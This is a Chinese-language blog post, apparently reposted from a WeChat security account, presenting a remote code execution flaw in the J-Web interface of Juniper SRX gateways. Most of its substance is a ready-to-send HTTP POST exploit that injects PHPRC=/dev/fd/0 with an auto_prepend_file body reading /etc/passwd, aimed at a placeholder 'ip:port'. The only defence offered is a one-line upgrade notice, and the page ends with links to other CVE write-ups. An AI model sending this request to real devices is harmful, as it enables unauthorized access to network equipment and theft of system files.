某网络设备RCE漏洞（附EXP）

2024年5月14日23:12:50评论8 views字数 719阅读2分23秒阅读模式

0x01 前言

瞻博网络 SRX 系列服务网关已预装瞻博网络 Junos 操作系统（Junos OS）。J-Web 界面允许您通过默认情况下使用安全套接字层 HTTP （HTTPS）启用的 Web 浏览器来监控、配置、故障排除和管理设备。该设备存在命令执行漏洞。

0x02 漏洞影响

影响版本

Juniper SRX系列

0x03 漏洞利用

登录界面

某网络设备RCE漏洞（附EXP）

EXP：

POST /?PHPRC=/dev/fd/0 HTTP/1.1Host: ip:portSec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ip：port/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 31auto_prepend_file="/etc/passwd"

命令执行成功！

某网络设备RCE漏洞（附EXP）

0x04 修复方案

请升级最新版本。

原文始发于微信公众号（阿无安全）：某网络设备RCE漏洞（附EXP）

左青龙
微信扫一扫

右白虎
微信扫一扫

某网络设备RCE漏洞（附EXP）

Apache HTTP Server 源代码泄露漏洞CVE-2024-39884

Splunk Splunk Enterprise未授权路径遍历漏洞CVE-2024-36991

Apache Tomcat资源分配控制不当CVE-2024-34750

Apache Tomcat 资源分配控制不当

0day|GeoServer远程代码执行漏洞(CVE-2024-36401)

Geoserver最全历史漏洞详解

HTTP File Server代码执行漏洞(CVE-2024-23692)

【攻防演练】GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401）

[含POC]宏景eHR LoadOtherTreeServlet SQL注入漏洞

Love-Yi情侣网站3.0存在SQL注入漏洞

发表评论

在线咨询

微信